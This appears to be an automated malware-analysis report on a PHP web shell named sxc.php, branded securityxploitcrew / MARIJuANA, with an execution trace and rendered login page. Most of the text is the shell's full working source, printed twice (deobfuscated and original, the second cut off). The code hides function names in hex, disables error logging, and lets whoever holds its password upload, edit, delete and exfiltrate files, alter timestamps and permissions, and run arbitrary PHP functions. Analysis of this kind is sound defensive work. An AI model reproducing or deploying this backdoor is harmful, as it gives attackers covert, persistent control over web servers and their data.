PHP Malware Analysis

sxc.php

md5: f0bbca0ab5e1ebb56f0f85acca17ae3d

Jump to:

Screenshot


Attributes

Environment

Input

Title
  • securityxploitcrew (HTML)

URLs


Deobfuscated PHP code

<?php

session_start();
error_reporting(0);
@set_time_limit(0);
@clearstatcache();
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
$aupas = "bf874b1820cb0cf51418dc2a8fbdc6b7";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'UTF-8';
date_default_timezone_set("Asia/Jakarta");
function login_shell()
{
    ?>
<!DOCTYPE html>
<html>
	<head>
		<meta name="viewport" content="widht=device-widht, initial-scale=1.0"/>
		<meta name="theme-color" content="#343a40"/>
		<title>securityxploitcrew</title>
		
	<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.0/css/bootstrap.min.css"/>
		<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.1/css/all.css"/>
		<link href="https://fonts.googleapis.com/css?family=Kelly+Slab" rel="stylesheet" type="text/css"> 

	</head>
	<style>
		body{
			background-color: black;
			background-size: cover;
			background-position: cover;
			}
		</style>
	<body>
		<div class="container text-center mt-3">
			<br>
			<font face="Kelly Slab" size="6" color="white">
 &lt;/SecurityXploitCrew&gt; </font>
			<br><br>
			<form method="post">
				<div class="form-group input-group">
					<div class="input-group-prepend">
						<div class="input-group-text"><i class="fa fa-user"></i></div>
					</div>
					<input type="password" name="pass" placeholder="Enter Password " class="form-control">
				</div>
				<input type="submit" class="btn btn-dark btn-block" class="form-control" value="Login">
			</form>
		</div>
	</body>
</html>
<?php 
    exit;
}
if (!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])) {
    if (isset($_POST['pass']) && md5($_POST['pass']) == $aupas) {
        $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
    } else {
        login_shell();
    }
}
?>

<?php 
header("X-XSS-Protection: 0");
ob_start();
set_time_limit(0);
error_reporting(0);
ini_set('display_errors', FALSE);
$Array = ['7068705f756e616d65', '70687076657273696f6e', '6368646972', '676574637764', '707265675f73706c6974', '636f7079', '66696c655f6765745f636f6e74656e7473', '6261736536345f6465636f6465', '69735f646972', '6f625f656e645f636c65616e28293b', '756e6c696e6b', '6d6b646972', '63686d6f64', '7363616e646972', '7374725f7265706c616365', '68746d6c7370656369616c6368617273', '7661725f64756d70', '666f70656e', '667772697465', '66636c6f7365', '64617465', '66696c656d74696d65', '737562737472', '737072696e7466', '66696c657065726d73', '746f756368', '66696c655f657869737473', '72656e616d65', '69735f6172726179', '69735f6f626a656374', '737472706f73', '69735f7772697461626c65', '69735f7265616461626c65', '737472746f74696d65', '66696c6573697a65', '726d646972', '6f625f6765745f636c65616e', '7265616466696c65', '617373657274'];
$___ = count($Array);
for ($i = 0; $i < $___; $i++) {
    $GNJ[] = uhex($Array[$i]);
}
?>
<!DOCTYPE html>
	<html dir="auto" lang="en-US">

		<head>
			<meta charset="UTF-8">
			<meta name="robots" content="NOINDEX, NOFOLLOW">

				<title>securityxploitcrew</title>

			<link rel="icon" href="//0x5a455553.github.io/MARIJUANA/icon.png" />
			<link rel="stylesheet" href="//0x5a455553.github.io/MARIJUANA/main.css" type="text/css">

			<script src="//ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
			<script src="//cdnjs.cloudflare.com/ajax/libs/notify/0.4.2/notify.min.js"></script>
		</head>

		<body>
			<header>
				<div class="y x">
					<a class="ajx" href="<?php 
echo basename($_SERVER['PHP_SELF']);
?>">
						MARIJuANA
					</a>
				</div>

				<div class="q x w">
					&#8212; DIOS &#8212; NO &#8212; CREA &#8212; NADA &#8212; EN &#8212; VANO &#8212;
				</div>
				
			</header>

			<article>
				<div class="i">
					<i class="far fa-hdd"></i>
					<?php 
echo $GNJ[0]();
?>

					<br />

					<i class="far fa-lightbulb"></i> &thinsp;&thinsp;<b>SOFT  :</b> <?php 
echo $_SERVER['SERVER_SOFTWARE'];
?> <b>PHP :</b> <?php 
echo $GNJ[1]();
?>

					<br />

					<i class="far fa-folder"></i>
					
					<?php 
if (isset($_GET["d"])) {
    $d = uhex($_GET["d"]);
    $GNJ[2](uhex($_GET["d"]));
} else {
    $d = $GNJ[3]();
}
$k = $GNJ[4]("/(\\\\|\\/)/", $d);
foreach ($k as $m => $l) {
    if ($l == '' && $m == 0) {
        echo "<a class=\"ajx\" href=\"?d=2f\">/</a>";
    }
    if ($l == '') {
        continue;
    }
    echo "<a class=\"ajx\" href=\"?d=";
    for ($i = 0; $i <= $m; $i++) {
        echo hex($k[$i]);
        if ($i != $m) {
            echo "2f";
        }
    }
    echo '">' . $l . '</a>/';
}
?>

					<br />

				</div>

				<div class="u">
					<?php 
echo $_SERVER['SERVER_ADDR'];
?> <i class="fas fa-link"></i>
					<br />

					<br />

					<form method="post" enctype="multipart/form-data">
						<label class="l w">
							<input type="file" name="n[]" onchange="this.form.submit()" multiple> &nbsp;UPLOAD
						</label>&nbsp;
					</form>

					<?php 
$o_ = ['<script>$.notify("', '", { className:"1",autoHideDelay: 2000,position:"left bottom" });</script>'];
$f = "<script>\$.notify(\"OK!\", { className:\"1\",autoHideDelay: 2000,position:\"left bottom\" });</script>";
$g = "<script>\$.notify(\"ER!\", { className:\"1\",autoHideDelay: 2000,position:\"left bottom\" });</script>";
if (isset($_FILES["n"])) {
    $z = $_FILES["n"]["name"];
    $r = count($z);
    for ($i = 0; $i < $r; $i++) {
        if ($GNJ[5]($_FILES["n"]["tmp_name"][$i], $z[$i])) {
            echo $f;
        } else {
            echo $g;
        }
    }
}
?>

				</div>
					<?php 
$a_ = '<table cellspacing="0" cellpadding="7" width="100%">
						<thead>
							<tr>
								<th>';
$b_ = '</th>
							</tr>
						</thead>
						<tbody>
							<tr>
								<td></td>
							</tr>
							<tr>
								<td class="x">';
$c_ = '</td>
							</tr>
						</tbody>
					</table>';
$d_ = '<br />
										<br />
										<input type="submit" class="w" value="&nbsp;OK&nbsp;" />
									</form>';
if (isset($_GET["s"])) {
    echo $a_ . uhex($_GET["s"]) . $b_ . '
									<textarea readonly="yes">' . $GNJ[15]($GNJ[6](uhex($_GET["s"]))) . '</textarea>
									<br />
									<br />
									<input onclick="location.href=\'?d=' . $_GET["d"] . '&e=' . $_GET["s"] . '\'" type="submit" class="w" value="&nbsp;EDIT&nbsp;" />
								' . $c_;
} elseif (isset($_GET["y"])) {
    echo "<table cellspacing=\"0\" cellpadding=\"7\" width=\"100%\">\r\n\t\t\t\t\t\t<thead>\r\n\t\t\t\t\t\t\t<tr>\r\n\t\t\t\t\t\t\t\t<th>REQUEST</th>\r\n\t\t\t\t\t\t\t</tr>\r\n\t\t\t\t\t\t</thead>\r\n\t\t\t\t\t\t<tbody>\r\n\t\t\t\t\t\t\t<tr>\r\n\t\t\t\t\t\t\t\t<td></td>\r\n\t\t\t\t\t\t\t</tr>\r\n\t\t\t\t\t\t\t<tr>\r\n\t\t\t\t\t\t\t\t<td class=\"x\">\r\n\t\t\t\t\t\t\t\t\t<form method=\"post\">\r\n\t\t\t\t\t\t\t\t\t\t<input class=\"x\" type=\"text\" name=\"1\" />&nbsp;&nbsp;\r\n\t\t\t\t\t\t\t\t\t\t<input class=\"x\" type=\"text\" name=\"2\" />\r\n\t\t\t\t\t\t\t\t\t\t<br />\r\n\t\t\t\t\t\t\t\t\t\t<br />\r\n\t\t\t\t\t\t\t\t\t\t<input type=\"submit\" class=\"w\" value=\"&nbsp;OK&nbsp;\" />\r\n\t\t\t\t\t\t\t\t\t</form>\r\n\t\t\t\t\t\t\t\t\t<br />\r\n\t\t\t\t\t\t\t\t\t<textarea readonly=\"yes\">";
    if (isset($_POST["2"])) {
        echo $GNJ[15](dre($_POST["1"], $_POST["2"]));
    }
    echo '</textarea>
								' . $c_;
} elseif (isset($_GET["e"])) {
    echo $a_ . uhex($_GET["e"]) . $b_ . '
									<form method="post">
										<textarea name="e" class="o">' . $GNJ[15]($GNJ[6](uhex($_GET["e"]))) . '</textarea>
										<br />
										<br />
										<span class="w">BASE64</span> :
										<select id="b64" name="b64">
											<option value="0">NO</option>
											<option value="1">YES</option>
										</select>
										' . $d_ . '
								' . $c_ . '
								
					<script>
						$("#b64").change(function() {
							if($("#b64 option:selected").val() == 0) {
								var X = $("textarea").val();
								var Z = atob(X);
								$("textarea").val(Z);
							}
							else {
								var N = $("textarea").val();
								var I = btoa(N);
								$("textarea").val(I);
							}
						});
					</script>';
    if (isset($_POST["e"])) {
        if ($_POST["b64"] == "1") {
            $ex = $GNJ[7]($_POST["e"]);
        } else {
            $ex = $_POST["e"];
        }
        $fp = $GNJ[17](uhex($_GET["e"]), 'w');
        if ($GNJ[18]($fp, $ex)) {
            OK();
        } else {
            ER();
        }
        $GNJ[19]($fp);
    }
} elseif (isset($_GET["x"])) {
    rec(uhex($_GET["x"]));
    if ($GNJ[26](uhex($_GET["x"]))) {
        ER();
    } else {
        OK();
    }
} elseif (isset($_GET["t"])) {
    echo $a_ . uhex($_GET["t"]) . $b_ . '
									<form action="" method="post">
										<input name="t" class="x" type="text" value="' . $GNJ[20]("Y-m-d H:i", $GNJ[21](uhex($_GET["t"]))) . '">
										' . $d_ . '
								' . $c_;
    if (!empty($_POST["t"])) {
        $p = $GNJ[33]($_POST["t"]);
        if ($p) {
            if (!$GNJ[25](uhex($_GET["t"]), $p, $p)) {
                ER();
            } else {
                OK();
            }
        } else {
            ER();
        }
    }
} elseif (isset($_GET["k"])) {
    echo $a_ . uhex($_GET["k"]) . $b_ . '
									<form action="" method="post">
										<input name="b" class="x" type="text" value="' . $GNJ[22]($GNJ[23]('%o', $GNJ[24](uhex($_GET["k"]))), -4) . '">
										' . $d_ . '
								' . $c_;
    if (!empty($_POST["b"])) {
        $x = $_POST["b"];
        $t = 0;
        for ($i = strlen($x) - 1; $i >= 0; --$i) {
            $t += (int) $x[$i] * pow(8, strlen($x) - $i - 1);
        }
        if (!$GNJ[12](uhex($_GET["k"]), $t)) {
            ER();
        } else {
            OK();
        }
    }
} elseif (isset($_GET["l"])) {
    echo $a_ . '+DIR' . $b_ . '
									<form action="" method="post">
										<input name="l" class="x" type="text" value="">
										' . $d_ . '
								' . $c_;
    if (isset($_POST["l"])) {
        if (!$GNJ[11]($_POST["l"])) {
            ER();
        } else {
            OK();
        }
    }
} elseif (isset($_GET["q"])) {
    if ($GNJ[10]("/var/www/html/sxc.php.103376ad5fead124481091042d34f4b6.bin")) {
        $GNJ[38]($GNJ[9]);
        header("Location: " . basename($_SERVER['PHP_SELF']) . "");
        exit;
    } else {
        echo $g;
    }
} elseif (isset($_GET["n"])) {
    echo $a_ . '+FILE' . $b_ . '
									<form action="" method="post">
										<input name="n" class="x" type="text" value="">
										' . $d_ . '
								' . $c_;
    if (isset($_POST["n"])) {
        if (!$GNJ[25]($_POST["n"])) {
            ER();
        } else {
            OK();
        }
    }
} elseif (isset($_GET["r"])) {
    echo $a_ . uhex($_GET["r"]) . $b_ . '
									<form action="" method="post">
										<input name="r" class="x" type="text" value="' . uhex($_GET["r"]) . '">
										' . $d_ . '
								' . $c_;
    if (isset($_POST["r"])) {
        if ($GNJ[26]($_POST["r"])) {
            ER();
        } else {
            if ($GNJ[27](uhex($_GET["r"]), $_POST["r"])) {
                OK();
            } else {
                ER();
            }
        }
    }
} elseif (isset($_GET["z"])) {
    $zip = new ZipArchive();
    $res = $zip->open(uhex($_GET["z"]));
    if ($res === TRUE) {
        $zip->extractTo(uhex($_GET["d"]));
        $zip->close();
        OK();
    } else {
        ER();
    }
} else {
    echo '<table cellspacing="0" cellpadding="7" width="100%">
						<thead>
							<tr>
								<th width="44%">[ NAME ]</th>
								<th width="11%">[ SIZE ]</th>
								<th width="17%">[ PERM ]</th>
								<th width="17%">[ DATE ]</th>
								<th width="11%">[ ACT ]</th>
							</tr>
						</thead>
						<tbody>
							<tr>
								<td>
									<a class="ajx" href="?d=' . hex($d) . '&n">+FILE</a>
									<a class="ajx" href="?d=' . hex($d) . '&l">+DIR</a>
								</td>
							</tr>
						';
    $h = "";
    $j = "";
    $w = $GNJ[13]($d);
    if ($GNJ[28]($w) || $GNJ[29]($w)) {
        foreach ($w as $c) {
            $e = $GNJ[14]("\\", "/", $d);
            if (!$GNJ[30]($c, ".zip")) {
                $zi = '';
            } else {
                $zi = '<a href="?d=' . hex($e) . '&z=' . hex($c) . '">U</a>';
            }
            if ($GNJ[31]("{$d}/{$c}")) {
                $o = "";
            } elseif (!$GNJ[32]("{$d}/{$c}")) {
                $o = " h";
            } else {
                $o = " w";
            }
            $s = $GNJ[34]("{$d}/{$c}") / 1024;
            $s = round($s, 3);
            if ($s >= 1024) {
                $s = round($s / 1024, 2) . " MB";
            } else {
                $s .= " KB";
            }
            if ($c != "." && $c != "..") {
                $GNJ[8]("{$d}/{$c}") ? $h .= '<tr class="r">
							<td>
								<i class="far fa-folder m"></i>
								<a class="ajx" href="?d=' . hex($e) . hex("/" . $c) . '">' . $c . '</a>
							</td>
							<td class="x">
								dir
							</td>
							<td class="x">
								<a class="ajx' . $o . '" href="?d=' . hex($e) . '&k=' . hex($c) . '">' . x("{$d}/{$c}") . '</a>
							</td>
							<td class="x">
								<a class="ajx" href="?d=' . hex($e) . '&t=' . hex($c) . '">' . $GNJ[20]("Y-m-d H:i", $GNJ[21]("{$d}/{$c}")) . '</a>
							</td>
							<td class="x">
								<a class="ajx" href="?d=' . hex($e) . '&r=' . hex($c) . '">R</a>
								<a href="?d=' . hex($e) . '&x=' . hex($c) . '">D</a>
							</td>
						</tr>
						
						' : ($j .= '<tr class="r">
							<td>
								<i class="far fa-file m"></i>&thinsp;
								<a class="ajx" href="?d=' . hex($e) . '&s=' . hex($c) . '">' . $c . '</a>
							</td>
							<td class="x">
								' . $s . '
							</td>
							<td class="x">
								<a class="ajx' . $o . '" href="?d=' . hex($e) . '&k=' . hex($c) . '">' . x("{$d}/{$c}") . '</a>
							</td>
							<td class="x">
								<a class="ajx" href="?d=' . hex($e) . '&t=' . hex($c) . '">' . $GNJ[20]("Y-m-d H:i", $GNJ[21]("{$d}/{$c}")) . '</a>
							</td>
							<td class="x">
								<a class="ajx" href="?d=' . hex($e) . '&r=' . hex($c) . '">R</a>
								<a class="ajx" href="?d=' . hex($e) . '&e=' . hex($c) . '">E</a>
								<a href="?d=' . hex($e) . '&g=' . hex($c) . '">G</a>
								' . $zi . '
								<a href="?d=' . hex($e) . '&x=' . hex($c) . '">D</a>
							</td>
						</tr>
						
						');
            }
        }
    }
    echo $h;
    echo $j;
    echo '</tbody>
						<tfoot>
							<tr>
								<th class="et">
									<a class="ajx" href="?d=' . hex($e) . '&y">REQUEST</a>
									<a href="?d=' . hex($e) . '&q">EXIT</a>
								</th>
								<th class="et" width="11%"></th>
								<th class="et" width="17%"></th>
								<th class="et" width="17%"></th>
								<th class="et" width="11%"></th>
							</tr>
					</tfoot>
				</table>';
}
?>

			</article>
			<footer class="x">
				&copy;TheAlmightyZeus
			</footer>
			<?php 
if (isset($_GET["1"])) {
    echo $f;
} elseif (isset($_GET["0"])) {
    echo $g;
} else {
    NULL;
}
?>

			<script>
				$(".ajx").click(function(t){t.preventDefault();var e=$(this).attr("href");history.pushState("","",e),$.get(e,function(t){$("body").html(t)})});
			</script>
		</body>
	</html>
<?php 
function rec($j)
{
    global $GNJ;
    if (trim(pathinfo($j, PATHINFO_BASENAME), '.') === '') {
        return;
    }
    if ($GNJ[8]($j)) {
        array_map('rec', glob($j . DIRECTORY_SEPARATOR . '{,.}*', "GLOB_N_SOWT"));
        $GNJ[35]($j);
    } else {
        $GNJ[10]($j);
    }
}
function dre($y1, $y2)
{
    global $GNJ;
    ob_start();
    $GNJ[16]($y1($y2));
    return $GNJ[36]();
}
function hex($n)
{
    $y = '';
    for ($i = 0; $i < strlen($n); $i++) {
        $y .= dechex(ord($n[$i]));
    }
    return $y;
}
function uhex($y)
{
    $n = '';
    for ($i = 0; $i < strlen($y) - 1; $i += 2) {
        $n .= chr(hexdec($y[$i] . $y[$i + 1]));
    }
    return $n;
}
function OK()
{
    global $GNJ, $d;
    $GNJ[38]($GNJ[9]);
    header("Location: ?d=" . hex($d) . "&1");
    exit;
}
function ER()
{
    global $GNJ, $d;
    $GNJ[38]($GNJ[9]);
    header("Location: ?d=" . hex($d) . "&0");
    exit;
}
function x($c)
{
    global $GNJ;
    $x = $GNJ[24]($c);
    if (($x & 0xc000) == 0xc000) {
        $u = "s";
    } elseif (($x & 0xa000) == 0xa000) {
        $u = "l";
    } elseif (($x & 0x8000) == 0x8000) {
        $u = "-";
    } elseif (($x & 0x6000) == 0x6000) {
        $u = "b";
    } elseif (($x & 0x4000) == 0x4000) {
        $u = "d";
    } elseif (($x & 0x2000) == 0x2000) {
        $u = "c";
    } elseif (($x & 0x1000) == 0x1000) {
        $u = "p";
    } else {
        $u = "u";
    }
    $u .= $x & 0x100 ? "r" : "-";
    $u .= $x & 0x80 ? "w" : "-";
    $u .= $x & 0x40 ? $x & 0x800 ? "s" : "x" : ($x & 0x800 ? "S" : "-");
    $u .= $x & 0x20 ? "r" : "-";
    $u .= $x & 0x10 ? "w" : "-";
    $u .= $x & 0x8 ? $x & 0x400 ? "s" : "x" : ($x & 0x400 ? "S" : "-");
    $u .= $x & 0x4 ? "r" : "-";
    $u .= $x & 0x2 ? "w" : "-";
    $u .= $x & 0x1 ? $x & 0x200 ? "t" : "x" : ($x & 0x200 ? "T" : "-");
    return $u;
}
if (isset($_GET["g"])) {
    $GNJ[38]($GNJ[9]);
    header("Content-Type: application/octet-stream");
    header("Content-Transfer-Encoding: Binary");
    header("Content-Length: " . $GNJ[34](uhex($_GET["g"])));
    header("Content-disposition: attachment; filename=\"" . uhex($_GET["g"]) . "\"");
    $GNJ[37](uhex($_GET["g"]));
}

Execution traces

data/traces/f0bbca0ab5e1ebb56f0f85acca17ae3d_trace-1676243672.146.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:14:58.043806]
1	0	1	0.000315	393512
1	3	0	0.000911	509120	{main}	1		/var/www/html/uploads/sxc.php	0	0
2	4	0	0.000929	509120	session_start	0		/var/www/html/uploads/sxc.php	2	0
2	4	1	0.000984	509872
2	4	R			TRUE
2	5	0	0.001001	509872	error_reporting	0		/var/www/html/uploads/sxc.php	3	1	0
2	5	1	0.001015	509912
2	5	R			22527
2	6	0	0.001028	509872	set_time_limit	0		/var/www/html/uploads/sxc.php	4	1	0
2	6	1	0.001042	509936
2	6	R			FALSE
2	7	0	0.001055	509904	clearstatcache	0		/var/www/html/uploads/sxc.php	5	0
2	7	1	0.001068	509904
2	7	R			NULL
2	8	0	0.001080	509904	ini_set	0		/var/www/html/uploads/sxc.php	6	2	'error_log'	NULL
2	8	1	0.001096	509976
2	8	R			''
2	9	0	0.001108	509904	ini_set	0		/var/www/html/uploads/sxc.php	7	2	'log_errors'	0
2	9	1	0.001122	509976
2	9	R			'1'
2	10	0	0.001134	509904	ini_set	0		/var/www/html/uploads/sxc.php	8	2	'max_execution_time'	0
2	10	1	0.001148	509944
2	10	R			'0'
2	11	0	0.001160	509872	ini_set	0		/var/www/html/uploads/sxc.php	9	2	'output_buffering'	0
2	11	1	0.001174	509944
2	11	R			FALSE
2	12	0	0.001186	509872	ini_set	0		/var/www/html/uploads/sxc.php	10	2	'display_errors'	0
2	12	1	0.001200	509944
2	12	R			''
1		A						/var/www/html/uploads/sxc.php	12	$aupas = 'bf874b1820cb0cf51418dc2a8fbdc6b7'
1		A						/var/www/html/uploads/sxc.php	13	$default_action = 'FilesMan'
1		A						/var/www/html/uploads/sxc.php	14	$default_use_ajax = TRUE
1		A						/var/www/html/uploads/sxc.php	15	$default_charset = 'UTF-8'
2	13	0	0.001258	509872	date_default_timezone_set	0		/var/www/html/uploads/sxc.php	16	1	'Asia/Jakarta'
2	13	1	0.001274	509936
2	13	R			TRUE
2	14	0	0.001288	509888	md5	0		/var/www/html/uploads/sxc.php	59	1	'localhost'
2	14	1	0.001301	509984
2	14	R			'421aa90e079fa326b6494f812ad13e79'
2	15	0	0.001317	509888	login_shell	1		/var/www/html/uploads/sxc.php	63	0
			0.001352	430568
TRACE END   [2023-02-12 21:14:58.044969]


Generated HTML code

<html><head>
		<meta name="viewport" content="widht=device-widht, initial-scale=1.0">
		<meta name="theme-color" content="#343a40">
		<title>securityxploitcrew</title>
		
	<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.0/css/bootstrap.min.css">
		<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.1/css/all.css">
		<link href="https://fonts.googleapis.com/css?family=Kelly+Slab" rel="stylesheet" type="text/css"> 

	<style>
		body{
			background-color: black;
			background-size: cover;
			background-position: cover;
			}
		</style></head>
	
	<body>
		<div class="container text-center mt-3">
			<br>
			<font face="Kelly Slab" size="6" color="white">
 &lt;/SecurityXploitCrew&gt; </font>
			<br><br>
			<form method="post">
				<div class="form-group input-group">
					<div class="input-group-prepend">
						<div class="input-group-text"><i class="fa fa-user"></i></div>
					</div>
					<input type="password" name="pass" placeholder="Enter Password " class="form-control">
				</div>
				<input type="submit" class="btn btn-dark btn-block" value="Login">
			</form>
		</div>
	

</body></html>

Original PHP code

<?php
session_start();
error_reporting(0);
@set_time_limit(0);
@clearstatcache();
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);

$aupas 			= "bf874b1820cb0cf51418dc2a8fbdc6b7";
$default_action 	= 'FilesMan';
$default_use_ajax 	= true;
$default_charset 	= 'UTF-8';
date_default_timezone_set("Asia/Jakarta");
function login_shell(){
?>
<!DOCTYPE html>
<html>
	<head>
		<meta name="viewport" content="widht=device-widht, initial-scale=1.0"/>
		<meta name="theme-color" content="#343a40"/>
		<title>securityxploitcrew</title>
		
	<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.0/css/bootstrap.min.css"/>
		<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.1/css/all.css"/>
		<link href="https://fonts.googleapis.com/css?family=Kelly+Slab" rel="stylesheet" type="text/css"> 

	</head>
	<style>
		body{
			background-color: black;
			background-size: cover;
			background-position: cover;
			}
		</style>
	<body>
		<div class="container text-center mt-3">
			<br>
			<font face="Kelly Slab" size="6" color="white">
 &lt;/SecurityXploitCrew&gt; </font>
			<br><br>
			<form method="post">
				<div class="form-group input-group">
					<div class="input-group-prepend">
						<div class="input-group-text"><i class="fa fa-user"></i></div>
					</div>
					<input type="password" name="pass" placeholder="Enter Password " class="form-control">
				</div>
				<input type="submit" class="btn btn-dark btn-block" class="form-control" value="Login">
			</form>
		</div>
	</body>
</html>
<?php
exit;
}
if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])){
	if(isset($_POST['pass']) && (md5($_POST['pass']) == $aupas)){
		$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
	}else{
		login_shell();
	}
}
?>

<?php header("X-XSS-Protection: 0");ob_start();set_time_limit(0);error_reporting(0);ini_set('display_errors', FALSE);
$Array = [
		'7068705f756e616d65',
		'70687076657273696f6e',
		'6368646972',
		'676574637764',
		'707265675f73706c6974',
		'636f7079',
		'66696c655f6765745f636f6e74656e7473',
		'6261736536345f6465636f6465',
		'69735f646972',
		'6f625f656e645f636c65616e28293b',
		'756e6c696e6b',
		'6d6b646972',
		'63686d6f64',
		'7363616e646972',
		'7374725f7265706c616365',
		'68746d6c7370656369616c6368617273',
		'7661725f64756d70',
		'666f70656e',
		'667772697465',
		'66636c6f7365',
		'64617465',
		'66696c656d74696d65',
		'737562737472',
		'737072696e7466',
		'66696c657065726d73',
		'746f756368',
		'66696c655f657869737473',
		'72656e616d65',
		'69735f6172726179',
		'69735f6f626a656374',
		'737472706f73',
		'69735f7772697461626c65',
		'69735f7265616461626c65',
		'737472746f74696d65',
		'66696c6573697a65',
		'726d646972',
		'6f625f6765745f636c65616e',
		'7265616466696c65',
		'617373657274',
];
$___ = count($Array);
for($i=0;$i<$___;$i++) {
	$GNJ[] = uhex($Array[$i]);
}
?>
<!DOCTYPE html>
	<html dir="auto" lang="en-US">

		<head>
			<meta charset="UTF-8">
			<meta name="robots" content="NOINDEX, NOFOLLOW">

				<title>securityxploitcrew</title>

			<link rel="icon" href="//0x5a455553.github.io/MARIJUANA/icon.png" />
			<link rel="stylesheet" href="//0x5a455553.github.io/MARIJUANA/main.css" type="text/css">

			<script src="//ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
			<script src="//cdnjs.cloudflare.com/ajax/libs/notify/0.4.2/notify.min.js"></script>
		</head>

		<body>
			<header>
				<div class="y x">
					<a class="ajx" href="<?php echo basename($_SERVER['PHP_SELF']);?>">
						MARIJuANA
					</a>
				</div>

				<div class="q x w">
					&#8212; DIOS &#8212; NO &#8212; CREA &#8212; NADA &#8212; EN &#8212; VANO &#8212;
				</div>
				
			</header>

			<article>
				<div class="i">
					<i class="far fa-hdd"></i>
					<?php echo $GNJ[0]();?>

					<br />

					<i class="far fa-lightbulb"></i> &thinsp;&thinsp;<b>SOFT  :</b> <?php echo $_SERVER['SERVER_SOFTWARE'];?> <b>PHP :</b> <?php echo $GNJ[1]();?>

					<br />

					<i class="far fa-folder"></i>
					
					<?php
					if(isset($_GET["d"])) {
						$d = uhex($_GET["d"]);
						$GNJ[2](uhex($_GET["d"]));
					}
					else {
						$d = $GNJ[3]();
					}
					$k = $GNJ[4]("/(\\\|\/)/", $d );
					foreach ($k as $m => $l) { 
						if($l=='' && $m==0) {
							echo '<a class="ajx" href="?d=2f">/</a>';
						}
						if($l == '') { 
							continue;
						}
						echo '<a class="ajx" href="?d=';
						for ($i = 0; $i <= $m; $i++) {
							echo hex($k[$i]); 
							if($i != $m) {
								echo '2f';
							}
						}
						echo '">'.$l.'</a>/'; 
					}
					?>

					<br />

				</div>

				<div class="u">
					<?php echo $_SERVER['SERVER_ADDR'];?> <i class="fas fa-link"></i>
					<br />

					<br />

					<form method="post" enctype="multipart/form-data">
						<label class="l w">
							<input type="file" name="n[]" onchange="this.form.submit()" multiple> &nbsp;UPLOAD
						</label>&nbsp;
					</form>

					<?php
					$o_ = [ 
							'<script>$.notify("',
							'", { className:"1",autoHideDelay: 2000,position:"left bottom" });</script>'
						];
					$f = $o_[0].'OK!'.$o_[1];
					$g = $o_[0].'ER!'.$o_[1];
					if(isset($_FILES["n"])) {
						$z = $_FILES["n"]["name"];
						$r = count($z);
						for( $i=0 ; $i < $r ; $i++ ) {
							if($GNJ[5]($_FILES["n"]["tmp_name"][$i], $z[$i])) {
								echo $f;
							}
							else {
								echo $g;
							}
						}
					}
					?>

				</div>
					<?php
					$a_ = '<table cellspacing="0" cellpadding="7" width="100%">
						<thead>
							<tr>
								<th>';
					$b_ = '</th>
							</tr>
						</thead>
						<tbody>
							<tr>
								<td></td>
							</tr>
							<tr>
								<td class="x">';
					$c_ = '</td>
							</tr>
						</tbody>
					</table>';
					$d_ = '<br />
										<br />
										<input type="submit" class="w" value="&nbsp;OK&nbsp;" />
									</form>';
					if(isset($_GET["s"])) {
						echo $a_.uhex($_GET["s"]).$b_.'
									<textarea readonly="yes">'.$GNJ[15]($GNJ[6](uhex($_GET["s"]))).'</textarea>
									<br />
									<br />
									<input onclick="location.href=\'?d='.$_GET["d"].'&e='.$_GET["s"].'\'" type="submit" class="w" value="&nbsp;EDIT&nbsp;" />
								'.$c_;
					}
					elseif(isset($_GET["y"])) {
						echo $a_.'REQUEST'.$b_.'
									<form method="post">
										<input class="x" type="text" name="1" />&nbsp;&nbsp;
										<input class="x" type="text" name="2" />
										'.$d_.'
									<br />
									<textarea readonly="yes">';

									if(isset($_POST["2"])) {
										echo $GNJ[15](dre($_POST["1"], $_POST["2"]));
									}

								echo '</textarea>
								'.$c_;
					}
					elseif(isset($_GET["e"])) {
						echo $a_.uhex($_GET["e"]).$b_.'
									<form method="post">
										<textarea name="e" class="o">'.$GNJ[15]($GNJ[6](uhex($_GET["e"]))).'</textarea>
										<br />
										<br />
										<span class="w">BASE64</span> :
										<select id="b64" name="b64">
											<option value="0">NO</option>
											<option value="1">YES</option>
										</select>
										'.$d_.'
								'.$c_.'
								
					<script>
						$("#b64").change(function() {
							if($("#b64 option:selected").val() == 0) {
								var X = $("textarea").val();
								var Z = atob(X);
								$("textarea").val(Z);
							}
							else {
								var N = $("textarea").val();
								var I = btoa(N);
								$("textarea").val(I);
							}
						});
					</script>';
					if(isset($_POST["e"])) {
						if($_POST["b64"] == "1") {
							$ex = $GNJ[7]($_POST["e"]);
						}
						else {
							$ex = $_POST["e"];
						}
						$fp = $GNJ[17](uhex($_GET["e"]), 'w');
						if($GNJ[18]($fp, $ex)) {
							OK();
						}
						else {
							ER();
						}
						$GNJ[19]($fp);
					  }
					}
					elseif(isset($_GET["x"])) {
						rec(uhex($_GET["x"]));
						if($GNJ[26](uhex($_GET["x"]))) {
							ER();
						}
						else {
							OK();
						}

					}
					elseif(isset($_GET["t"])) {
						echo $a_.uhex($_GET["t"]).$b_.'
									<form action="" method="post">
										<input name="t" class="x" type="text" value="'.$GNJ[20]("Y-m-d H:i", $GNJ[21](uhex($_GET["t"]))).'">
										'.$d_.'
								'.$c_;
					if( !empty($_POST["t"]) ) {
						$p = $GNJ[33]($_POST["t"]);
						if($p) {
							if(!$GNJ[25](uhex($_GET["t"]),$p,$p)) {
								ER();
							}
							else {
								OK();
							}
						}
						else {
							ER();
						}
					  }
					}
					elseif(isset($_GET["k"])) {
						echo $a_.uhex($_GET["k"]).$b_.'
									<form action="" method="post">
